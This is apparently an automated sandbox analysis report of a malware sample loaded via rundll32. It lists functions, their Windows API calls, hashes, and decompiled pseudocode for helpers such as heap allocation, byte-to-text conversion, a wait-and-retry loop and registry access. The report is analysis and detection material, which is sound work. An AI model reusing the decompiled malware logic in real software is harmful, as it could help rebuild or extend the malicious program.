                          Function 05B6C9A9 Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                          Download Yara Rule
                          APIs
                          • InterlockedIncrement.KERNEL32(05B8A05C), ref: 05B6C9BE
                            • Part of subcall function 05B72331: GetSystemTimeAsFileTime.KERNEL32(?), ref: 05B7235C
                            • Part of subcall function 05B72331: HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 05B72369
                            • Part of subcall function 05B72331: NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 05B723F5
                            • Part of subcall function 05B72331: GetModuleHandleA.KERNEL32(00000000), ref: 05B72400
                            • Part of subcall function 05B72331: RtlImageNtHeader.NTDLL(00000000), ref: 05B72409
                            • Part of subcall function 05B72331: RtlExitUserThread.NTDLL(00000000), ref: 05B7241E
                          • InterlockedDecrement.KERNEL32(05B8A05C), ref: 05B6C9E2
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: InterlockedThreadTime$CreateDecrementExitFileHandleHeaderHeapImageIncrementInformationModuleQuerySystemUser
                          • String ID:
                          • API String ID: 1011034841-0
                          • Opcode ID: fec6114724fee4abc6ff3b1de091453a5d32e5d58eb5497d42b21d885e08b139
                          • Instruction ID: 741f98d7607905841f5d020bd640364035174468283e7a26b519040f0c0a79f6
                          • Opcode Fuzzy Hash: fec6114724fee4abc6ff3b1de091453a5d32e5d58eb5497d42b21d885e08b139
                          • Instruction Fuzzy Hash: 17E0127234C126A7CB226AF49848B7EAF56FB01690F005695F9E9F10D0CA24FC50D6D1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B81DED Relevance: 2.6, APIs: 2, Instructions: 70memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B755E4: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 05B7561D
                            • Part of subcall function 05B755E4: VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 05B75653
                            • Part of subcall function 05B755E4: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 05B7565F
                            • Part of subcall function 05B755E4: lstrcmpi.KERNEL32(?,00000000), ref: 05B7569C
                            • Part of subcall function 05B755E4: StrChrA.SHLWAPI(?,0000002E), ref: 05B756A5
                            • Part of subcall function 05B755E4: lstrcmpi.KERNEL32(?,00000000), ref: 05B756B7
                            • Part of subcall function 05B755E4: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 05B75708
                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00000010,?,?,?,05B860E0,0000002C,05B790D3,05FB8E36,?,00000000,05B7A484), ref: 05B81E2C
                            • Part of subcall function 05B7A806: GetProcAddress.KERNEL32(?,00000000), ref: 05B7A82F
                            • Part of subcall function 05B7A806: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,05B76230,00000000,00000000,00000028,00000100), ref: 05B7A851
                          • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,05B860E0,0000002C,05B790D3,05FB8E36,?,00000000,05B7A484,?,00000318), ref: 05B81EB7
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocFree$lstrcmpi$AddressMemory64ProcReadWow64
                          • String ID:
                          • API String ID: 4138075514-0
                          • Opcode ID: abfd06318ab7bf51fc8303c20c5b9a765faff31a3730814a56104cd392fae439
                          • Instruction ID: 97eacd0d70ed82374204b55c0e4a2f5665215f8128930caf63a92f529b49c6a1
                          • Opcode Fuzzy Hash: abfd06318ab7bf51fc8303c20c5b9a765faff31a3730814a56104cd392fae439
                          • Instruction Fuzzy Hash: 8521C671E02229EBCF11EFA5DC84AEEBBB5FF08720F10916AE914B6150D3346941DF94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B818C0 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleA.KERNEL32(?,00000000,?,00000000,05B80977,05B7893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 05B818D5
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: HandleModule
                          • String ID:
                          • API String ID: 4139908857-0
                          • Opcode ID: fce7ee20b2179b4d79917a396965a752149f72349d14ca7e4eebc560f0eae70f
                          • Instruction ID: daaca8d517020fb6e20d1df337c01ad3264f5ce94d38e12aa496c11ac0b10749
                          • Opcode Fuzzy Hash: fce7ee20b2179b4d79917a396965a752149f72349d14ca7e4eebc560f0eae70f
                          • Instruction Fuzzy Hash: E3318276A01204EFCB10FF9CD885DBDB7B6FB45220B5554EAE215AB300C730B942CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01001C03 Relevance: 1.6, APIs: 1, Instructions: 75memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 92%
                          			E01001C03(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
				signed int _v5;
				signed int _v12;
				void* _t32;
				signed int _t37;
				signed int _t39;
				signed char _t45;
				void* _t49;
				char* _t51;
				signed int _t65;
				signed int _t66;
				signed int _t69;

				_v12 = _v12 & 0x00000000;
				_t69 = __eax;
				_t32 = RtlAllocateHeap( *0x100a2d8, 0, __eax << 2); // executed
				_t49 = _t32;
				if(_t49 == 0) {
					_v12 = 8;
				} else {
					 *_a8 = _t49;
					do {
						_t45 =  *_a4;
						asm("cdq");
						_t65 = 0x64;
						_t37 = (_t45 & 0x000000ff) / _t65;
						_v5 = _t37;
						if(_t37 != 0) {
							 *_t49 = _t37 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t37 * 0x9c;
						}
						asm("cdq");
						_t66 = 0xa;
						_t39 = (_t45 & 0x000000ff) / _t66;
						if(_t39 != 0 || _v5 != _t39) {
							 *_t49 = _t39 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t39 * 0xf6;
						}
						_a4 = _a4 + 1;
						 *_t49 = _t45 + 0x30;
						 *(_t49 + 1) = 0x2c;
						_t49 = _t49 + 2;
						_t69 = _t69 - 1;
					} while (_t69 != 0);
					_t51 = _t49 - 1;
					 *_a12 = _t51 -  *_a8;
					 *_t51 = 0;
				}
				return _v12;
			}














                          0x01001c08
                          0x01001c0d
                          0x01001c1b
                          0x01001c21
                          0x01001c25
                          0x01001c96
                          0x01001c27
                          0x01001c2b
                          0x01001c2e
                          0x01001c31
                          0x01001c38
                          0x01001c39
                          0x01001c3a
                          0x01001c3c
                          0x01001c41
                          0x01001c48
                          0x01001c4e
                          0x01001c4f
                          0x01001c4f
                          0x01001c56
                          0x01001c57
                          0x01001c58
                          0x01001c5c
                          0x01001c68
                          0x01001c6e
                          0x01001c6f
                          0x01001c6f
                          0x01001c71
                          0x01001c77
                          0x01001c79
                          0x01001c7e
                          0x01001c7f
                          0x01001c7f
                          0x01001c85
                          0x01001c8e
                          0x01001c90
                          0x01001c93
                          0x01001ca2

                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 01001C1B
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: 02149e3b8c2dcbcb11f23f2fd91dbdf63ab3ae60d42362c71dbac5e584561188
                          • Instruction ID: 9f0e5d48d17eebef006f1cd9e557586e0e4a4bb14412e416fcec09463b50cdb6
                          • Opcode Fuzzy Hash: 02149e3b8c2dcbcb11f23f2fd91dbdf63ab3ae60d42362c71dbac5e584561188
                          • Instruction Fuzzy Hash: F611B131285344AFFB168F2DD895BE97BA9DB53358F18408AE5809B2D2C277C50BC720
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B64A9F Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleA.KERNEL32(?,05B899DC,-0000000C,?,?,?,05B7C01A,00000006,?,00000000,00000000,05B610B0,00000000,05B89F2C,00000008,00000003), ref: 05B64ADA
                            • Part of subcall function 05B674AE: NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,05B8A400), ref: 05B674C5
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: HandleInformationModuleProcessQuery
                          • String ID:
                          • API String ID: 2776635927-0
                          • Opcode ID: e50def5a669e6417a5ce92255d493965d87f7cbefe40ab65623be28f94b634d9
                          • Instruction ID: b97523c98d2c39d96d628fa5f419759eb48d7da49aee48bb80c445d01d457959
                          • Opcode Fuzzy Hash: e50def5a669e6417a5ce92255d493965d87f7cbefe40ab65623be28f94b634d9
                          • Instruction Fuzzy Hash: AF21C036200A04AFCF21CF9AC4C0E7A77A6FF4429472884ADE9468B250D676F901CB20
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0100375F Relevance: 1.6, APIs: 1, Instructions: 70synchronizationCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E0100375F(signed int* __ecx, intOrPtr _a4, signed int* _a8, signed int* _a12) {
				intOrPtr _v12;
				signed int _v20;
				intOrPtr _v24;
				signed int _v60;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t14;
				signed int* _t16;
				signed int _t25;
				signed int _t26;
				signed int* _t28;
				signed int _t30;

				_t28 = __ecx;
				_t14 =  *0x100a368; // 0x5299618
				_v12 = _t14;
				_t16 = _a12;
				_t30 = 8;
				if(_t16 != 0) {
					 *_t16 =  *_t16 & 0x00000000;
				}
				do {
					_t31 =  &_v68;
					if(E0100227F( &_v68) == 0) {
						goto L16;
					}
					_t30 = E01006954(_t31, _a4, _v12);
					if(_t30 == 0) {
						_t25 = E01001CA5(_t31, _t28); // executed
						_t30 = _t25;
						if(_t30 != 0) {
							if(_t30 == 0x102) {
								E0100A000 = E0100A000 + 0xea60;
							}
						} else {
							if(_v24 != 0xc8) {
								_t30 = 0xe8;
							} else {
								_t26 = _v20;
								if(_t26 == 0) {
									_t30 = 0x10d2;
								} else {
									_t28 = _a8;
									if(_t28 != 0) {
										_v60 = _v60 & _t30;
										 *_t28 = _v60;
										_t28 = _a12;
										if(_t28 != 0) {
											 *_t28 = _t26;
										}
									}
								}
							}
						}
					}
					E01004274( &_v68, 0x102, _t28, _t30);
					L16:
				} while (_t30 == 0x2f19 && WaitForSingleObject( *0x100a30c, 0) == 0x102);
				return _t30;
			}

















                          0x0100375f
                          0x01003765
                          0x0100376c
                          0x01003774
                          0x0100377a
                          0x0100377d
                          0x0100377f
                          0x0100377f
                          0x01003787
                          0x01003787
                          0x01003791
                          0x00000000
                          0x00000000
                          0x010037a0
                          0x010037a4
                          0x010037a8
                          0x010037ad
                          0x010037b1
                          0x010037ed
                          0x010037ef
                          0x010037ef
                          0x010037b3
                          0x010037ba
                          0x010037e4
                          0x010037bc
                          0x010037bc
                          0x010037c1
                          0x010037dd
                          0x010037c3
                          0x010037c3
                          0x010037c8
                          0x010037cd
                          0x010037d0
                          0x010037d2
                          0x010037d7
                          0x010037d9
                          0x010037d9
                          0x010037d7
                          0x010037c8
                          0x010037c1
                          0x010037ba
                          0x010037b1
                          0x010037fc
                          0x01003801
                          0x01003801
                          0x01003825

                          APIs
                          • WaitForSingleObject.KERNEL32(00000000,76CC81D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01003811
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: ObjectSingleWait
                          • String ID:
                          • API String ID: 24740636-0
                          • Opcode ID: 5f99bb3af211ad30a4c6e5f01c6184c6f88c8d88ea576e6dd242e8b4efbea928
                          • Instruction ID: 548983efc76e0ead5db680957978d6b6f9363eaa0ea0d6ae1a4959f058d952d1
                          • Opcode Fuzzy Hash: 5f99bb3af211ad30a4c6e5f01c6184c6f88c8d88ea576e6dd242e8b4efbea928
                          • Instruction Fuzzy Hash: 7A2158B670024A9FFB63DF5DD880BAE7BA5BB81350F1040BAE6899B280DB75D8418750
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01001B6F Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                          Download Yara Rule
                          C-Code - Quality: 34%
                          			E01001B6F(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x100a348; // 0x428d5a8
				_t4 = _t15 + 0x100b3a0; // 0x5298948
				_t20 = _t4;
				_t6 = _t15 + 0x100b124; // 0x650047
				_t17 = E010046CB(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E010059AE(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                          0x01001b79
                          0x01001b80
                          0x01001b81
                          0x01001b82
                          0x01001b83
                          0x01001b89
                          0x01001b8e
                          0x01001b8e
                          0x01001b98
                          0x01001baa
                          0x01001bb1
                          0x01001bdf
                          0x01001bb3
                          0x01001bb5
                          0x01001bba
                          0x01001bdc
                          0x01001bbc
                          0x01001bbf
                          0x01001bc6
                          0x01001bcb
                          0x01001bcd
                          0x01001bcd
                          0x01001bd2
                          0x01001bd2
                          0x01001bba
                          0x01001be6

                          APIs
                            • Part of subcall function 010046CB: SysFreeString.OLEAUT32(?), ref: 010047AA
                            • Part of subcall function 010059AE: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,01005EFA,004F0053,00000000,?), ref: 010059B7
                            • Part of subcall function 010059AE: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,01005EFA,004F0053,00000000,?), ref: 010059E1
                            • Part of subcall function 010059AE: memset.NTDLL ref: 010059F5
                          • SysFreeString.OLEAUT32(00000000), ref: 01001BD2
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: FreeString$lstrlenmemcpymemset
                          • String ID:
                          • API String ID: 397948122-0
                          • Opcode ID: b0d3fe706557b4811ad3799c1cbfc298fa706c3ef66a651cab1a311c57cdd165
                          • Instruction ID: ede0f4d5f4b8964309947a8a8229bb482131407d08a59adaada41b0888ada0f2
                          • Opcode Fuzzy Hash: b0d3fe706557b4811ad3799c1cbfc298fa706c3ef66a651cab1a311c57cdd165
                          • Instruction Fuzzy Hash: 35015A32500519BFEB139FA8DC05DEABBB9FB08750F004465EA81E71A0E771E915C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01002E4E Relevance: 1.5, APIs: 1, Instructions: 41memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 89%
                          			E01002E4E(signed int __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
				char _v8;
				void* _t14;
				intOrPtr _t17;
				void* _t20;
				void* _t26;

				_push(__ecx);
				if(_a4 == 0 || __eax == 0) {
					_t26 = 0x57;
				} else {
					_t14 = E01001C03(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
					_t26 = _t14;
					if(_t26 == 0) {
						_t17 =  *0x100a348; // 0x428d5a8
						_t9 = _t17 + 0x100ba40; // 0x444f4340
						_t20 = E01003B58( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
						_t26 = _t20;
						RtlFreeHeap( *0x100a2d8, 0, _a4); // executed
					}
				}
				return _t26;
			}








                          0x01002e51
                          0x01002e57
                          0x01002eae
                          0x01002e5d
                          0x01002e68
                          0x01002e6d
                          0x01002e71
                          0x01002e7e
                          0x01002e86
                          0x01002e92
                          0x01002e9a
                          0x01002ea4
                          0x01002ea4
                          0x01002e71
                          0x01002eb3

                          APIs
                            • Part of subcall function 01001C03: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 01001C1B
                            • Part of subcall function 01003B58: lstrlen.KERNEL32(76CDF710,?,00000000,?,76CDF710), ref: 01003B8C
                            • Part of subcall function 01003B58: StrStrA.SHLWAPI(00000000,?), ref: 01003B99
                            • Part of subcall function 01003B58: RtlAllocateHeap.NTDLL(00000000,?), ref: 01003BB8
                          • RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,0100553D), ref: 01002EA4
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: Heap$Allocate$Freelstrlen
                          • String ID:
                          • API String ID: 2220322926-0
                          • Opcode ID: 1ce8351b5b22a4830f8f5e3077a8011268ffef8a7fefc7bf31e5ca2a82de03fd
                          • Instruction ID: 806b59a9a5035d0f8ac993e210dce8a15e3d7d5adc1bdc948f48efab4319e415
                          • Opcode Fuzzy Hash: 1ce8351b5b22a4830f8f5e3077a8011268ffef8a7fefc7bf31e5ca2a82de03fd
                          • Instruction Fuzzy Hash: 72016D36200608FFEB23CF48CC04EAA7BE9EB54340F104029FA85861A4E772EA459B50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01004675 Relevance: 1.5, APIs: 1, Instructions: 32registryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 58%
                          			E01004675(void* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t14;
				void* _t16;
				void* _t17;
				void* _t18;

				if(_a4 == 0) {
					L2:
					_t18 =  *0x100a0c8(_a8, _a12,  &_a4);
					if(_t18 == 0) {
						RegCloseKey(_a4);
					}
					L4:
					return _t18;
				}
				_t14 =  *0x100a348; // 0x428d5a8
				_t2 = _t14 + 0x100b180; // 0x720043
				_t16 = E010046CB(_t17, _a4, _a8, _a12, _t2, 0, 0, 0); // executed
				_t18 = _t16;
				if(_t18 == 0) {
					goto L4;
				}
				goto L2;
			}







                          0x0100467d
                          0x010046a5
                          0x010046b5
                          0x010046b9
                          0x010046be
                          0x010046be
                          0x010046c4
                          0x010046c8
                          0x010046c8
                          0x0100467f
                          0x0100468a
                          0x0100469a
                          0x0100469f
                          0x010046a3
                          0x00000000
                          0x00000000
                          0x00000000

                          APIs
                          • RegCloseKey.ADVAPI32(00000000,?,01006F4E,3D010090,00000000,80000002,?,80000002,?,?,?,01003520,80000002), ref: 010046BE
                            • Part of subcall function 010046CB: SysFreeString.OLEAUT32(?), ref: 010047AA
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: CloseFreeString
                          • String ID:
                          • API String ID: 3574410727-0
                          • Opcode ID: 784645dc6d8ed749dfe08b48b9584b7c4e0fd1590811ef844742a5ce17124364
                          • Instruction ID: ad62bbaf861c82a3ca1d0fea18075d0be092edf6fd640c6287ae2a4139bb2035
                          • Opcode Fuzzy Hash: 784645dc6d8ed749dfe08b48b9584b7c4e0fd1590811ef844742a5ce17124364
                          • Instruction Fuzzy Hash: 06F03032101619FBEB238F44DC44FE93BA8AB08750F048120FF84DA1A0DB31D9649B85
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B8309E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 05B83090
                            • Part of subcall function 05B831E3: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,000260DC,05B60000), ref: 05B8325C
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExceptionHelper2@8LoadRaise___delay
                          • String ID:
                          • API String ID: 123106877-0
                          • Opcode ID: c706b7577d6591a6d84c347af985cec4ec2442a659fec0f2f0a06422987a0e38
                          • Instruction ID: 78875ba4f56318564f5276cb0b6594b8700e11d3eef3094e07973cbe29e42c42
                          • Opcode Fuzzy Hash: c706b7577d6591a6d84c347af985cec4ec2442a659fec0f2f0a06422987a0e38
                          • Instruction Fuzzy Hash: 87A00295299101BD370475515D46D37175DC4D4D513306D9DE41284050545239459075
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B83083 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 05B83090
                            • Part of subcall function 05B831E3: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,000260DC,05B60000), ref: 05B8325C
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExceptionHelper2@8LoadRaise___delay
                          • String ID:
                          • API String ID: 123106877-0
                          • Opcode ID: 9daf842a61e10a417674cc59917b0bbfda11416ae24c945b1ea624f6cc0a8fe9
                          • Instruction ID: 9da2604a8a6795e75dc25d9010a152963610475bf96b464cf0c035bcab75c53c
                          • Opcode Fuzzy Hash: 9daf842a61e10a417674cc59917b0bbfda11416ae24c945b1ea624f6cc0a8fe9
                          • Instruction Fuzzy Hash: B0A002952D55017D371475515D46D37175DC4E0D113306D9DF41194050545239459075
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7E803 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                          Download Yara Rule
                          APIs
                          • RtlFreeHeap.NTDLL(00000000,?,05B73953,?,?,05B7BF5B,00000000,00000000,05B610B0,00000000,05B89F2C,00000008,00000003), ref: 05B7E80F
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeHeap
                          • String ID:
                          • API String ID: 3298025750-0
                          • Opcode ID: a8718c465ef4caf33a720e45c79329e850671bb8a61e0f7f3bf923f20335e4b9
                          • Instruction ID: c1ed01d6ca840ffe892eb80be9ebfe6a0c659df3c22f8e066de1d36603b4df3a
                          • Opcode Fuzzy Hash: a8718c465ef4caf33a720e45c79329e850671bb8a61e0f7f3bf923f20335e4b9
                          • Instruction Fuzzy Hash: 3CB01231010100BBCA114B00DD06F157F23AB50700F005411B208910A08A317468FB04
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B69394 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                          Download Yara Rule
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: 101dcdee751f592a56f32a6e46039da119537b3d2ee09ca84122b6d0cf98f4f4
                          • Instruction ID: b73367110ce5f559d88ac92af6ecffb9c191f60ef06ba9472a688ada539d8708
                          • Opcode Fuzzy Hash: 101dcdee751f592a56f32a6e46039da119537b3d2ee09ca84122b6d0cf98f4f4
                          • Instruction Fuzzy Hash: 52B01275110100BBCA114B00DE06F157F23A750700F005011B308590A08A317424FB04
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01006D63 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E01006D63(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x100a2d8, 0, _a4); // executed
				return _t2;
			}




                          0x01006d6f
                          0x01006d75

                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,00000000,01005D7B), ref: 01006D6F
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: 583044a9a8349aeeeee6c79f6150d861e03a1b9f89c0175191fece038514f467
                          • Instruction ID: eff529b97c5d53e55236256de71bb88d5f7b22203032ef1a7ffc286af0dc605c
                          • Opcode Fuzzy Hash: 583044a9a8349aeeeee6c79f6150d861e03a1b9f89c0175191fece038514f467
                          • Instruction Fuzzy Hash: 26B01231100300EFCA238B00DD08F057B21B790700F008020B2884007982370460FB04
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01006C2C Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E01006C2C(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x100a2d8, 0, _a4); // executed
				return _t2;
			}




                          0x01006c38
                          0x01006c3e

                          APIs
